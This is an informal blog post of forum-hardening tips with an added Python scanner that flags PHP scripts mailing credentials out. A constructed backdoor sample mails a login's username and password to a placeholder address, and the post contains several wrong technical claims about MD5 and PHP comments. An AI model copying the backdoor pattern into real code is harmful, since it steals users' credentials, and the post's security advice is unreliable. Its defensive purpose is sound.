aloKNsh

Some Tips To Protect Your Forum From Being Hacked. Especially for VB and IPB, but can be for all kinds of boards.


Hackers are interested in the various forums which are highly appreciated and popular on the net. It's child's play for a person to get into a forum if he knows the basics of the forum and has the correct resources. Cracking in with the password is, I think, a hard job, so most likely they enter through the hash cracking code. There are tons of scripts available on the net offering ways to get the MD5 hash code of a member. An MD5 hash is a kind of password encrypted in some unknown pattern which can only be broken by an expert. The scripts are generally run on a Perl-based OS platform, and through them they attack the forum.

It's common that the forum will have its 1st member as admin (most probably), which makes it easy for the hackers to get the hash code. They just enter the name of the admin and the number of the user, I mean the member number, which is generally 1 for the admin in almost all forums and plays a big role in getting the codes cracked. If we put some general members who have no power, like a registered user, in place of the admin, with the admin being somewhere at the 6th or 7th number, then it will make it a bit difficult for a hacker to get the correct username and registered number.

Now you would think how to get this done. It's simple: first make your own forum, then make an admin, which is the first user. Register some more, almost 2 or 3 users, then make one more user which is also an admin of the forum; logging in to the forum as the 6th or 7th member will allow you to revoke the admin privileges from the first member. Let the name of the first member be admin, but without the powers of admin. It will make the hackers think that the 1st member is admin and they will enter the username with the number 1. If everything is right then they might get the MD5 hash code, which can be cracked by a professional. There are many sites offering MD5 cracking, and also for free.

You will just need to submit your code and wait for the member or hacker to crack the code, and once it's cracked they will post it on their site, which is public, and then you can try to enter that password, which is a simple word or general unencrypted password, with the username admin. Once he is in he would probably rejoice for a minute, but when he finds out that the 1st member was not the admin but just a mask of admin, he will probably get frustrated and move out of the forum, or will try again to get in. This time it's obvious that he or she will get the correct number of the admin and the real admin by just looking at the forum leaders. He will again follow the same process, get the MD5 code and give it to an MD5 hacker to break, which will take another week for them to break.

So it's advisable to change the passwords of the admins and mods every 7 to 10 days, because if he is able to get the MD5 broken he will probably try to get into the account, but if the password is changed every week then I think it's impossible to get the forum hacked, as no site offers fast MD5 cracking and no one can crack it in less than 5 days, so it will give the wrong password error and your forum is safe. He will try every week, but as the password is also changed every week it's almost impossible for the coder to get into the forum and fulfill his dreams.

Another big issue is that of faulting with the DB of the forum. This can be done only if he has access to the FTP account on your server. So whenever you get a new site, the first job you should do is to make the FTP private so that only the one having the password and username can enter the FTP account. FTP lets you get the files from the server and then upload them again without letting you know. By default the FTP accounts are closed, but in some cases the account has an FTP account with anonymous as the username and anonymous as the password, which is easy for a geek to guess.

So the next time you get a site, first remove the FTP permissions, and also keep changing the password at intervals of 2 to 3 weeks. It's a good practice; not to say that it is guaranteed that your account will be safe, but just to say that your account can be safer than all the others.

Next, the hackers target the mods and the smods, as they just don't care about the forum as much as the admins and some special members, so getting their password via the MD5 hash is easy as they are most likely not to change their password. So next time you get a mod for your forum, ask them strictly to change their password every 6 to 7 days.

The next tip is to never use a null script, and if you are using one then kindly go through the full script carefully, as there are chances of the script having a backdoor entry option, meaning the developer of the script might have coded a line to get the admin's username and pass every time that script is installed, and the mail goes automatically to the developer with the username and the pass of the script. It is advisable to go through the script carefully and check it more carefully on the admin page and general index pages, as they have the most chances of having those crap codes which will steal your data and send it to the original owner. So whenever you go through a script before installing it in the forum, try to look for something like [...@..]. Generally the coders code it so that as soon as the script is run, the script automatically finds some of the lines which match its predefined template, and if it gets the line it sends it to the owner. So next time you go through the script, kindly look for those kinds of notes, and if you see any just remove that code, or if in PHP then add // before and after the code. It will make the code a statement and the script will ignore that line. But be aware that some scripts will have this as their contact us page, and you don't want to destroy the contact us page, so kindly use your own common sense also.

Last but not least, it's not 100% sure that if you follow all these steps you will have your forum protected, but it will make the forum almost protected, at least better than the others. But be aware that for a hacker who is just crazy about your forum, it can be hacked by some kind of new method which I don't know, so use your own brain and keep yourself up to date to save yourself and your forum from being hacked.

Regards, alok.
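
The pre-install review the post describes (reading a script for e-mail addresses and mailing code, while leaving a genuine contact page alone) can be partly automated. This is an added example, not part of the original post: the function name `audit_php`, the regular expressions and both PHP samples are assumptions constructed for illustration, and a "review" result still needs a human to read the line.

```python
import re

# Heuristic patterns: assumptions for this example, not an exhaustive list.
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_CALL = re.compile(r"\b(?:mail|mb_send_mail)\s*\(", re.I)
SENSITIVE = re.compile(r"pass(?:word|wd)?|\$_(?:POST|REQUEST|COOKIE)|md5\s*\(", re.I)
OBFUSCATED = re.compile(r"\b(?:eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def audit_php(source, window=3):
    """Return (line_no, severity, reasons) for each suspicious line of PHP text."""
    lines = source.splitlines()
    findings = []
    for i, line in enumerate(lines):
        if line.lstrip().startswith(("//", "#", "/*", "*")):
            continue  # comment-only line, nothing executes here
        severity, reasons = "review", []
        if MAIL_CALL.search(line):
            # A mailer within a few lines of credential handling is the pattern
            # the post warns about; a contact form normally has none nearby.
            context = "\n".join(lines[max(0, i - window): i + window + 1])
            if SENSITIVE.search(context):
                severity = "high"
                reasons.append("mail() next to credential handling")
            else:
                reasons.append("mail() call")
        reasons += ["hard-coded address " + a for a in EMAIL.findall(line)]
        if OBFUSCATED.search(line):
            reasons.append("encoded/eval'd code that can hide a mailer")
        if reasons:
            findings.append((i + 1, severity, "; ".join(reasons)))
    return findings

# Constructed samples (not from any real forum package).
BACKDOOR = """<?php
// admin login handler
$user = $_POST['username'];
$pass = $_POST['password'];
if (check_login($user, md5($pass))) {
    @mail("dev@example.invalid", "new install", "$user:$pass");
    start_session($user);
}
"""
CONTACT = """<?php
$msg = htmlspecialchars($_GET['message']);
mail("webmaster@example.org", "Contact form", $msg);
"""

if __name__ == "__main__":
    for name, src in (("login.php", BACKDOOR), ("contact.php", CONTACT)):
        for finding in audit_php(src):
            print(name, *finding)
```
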
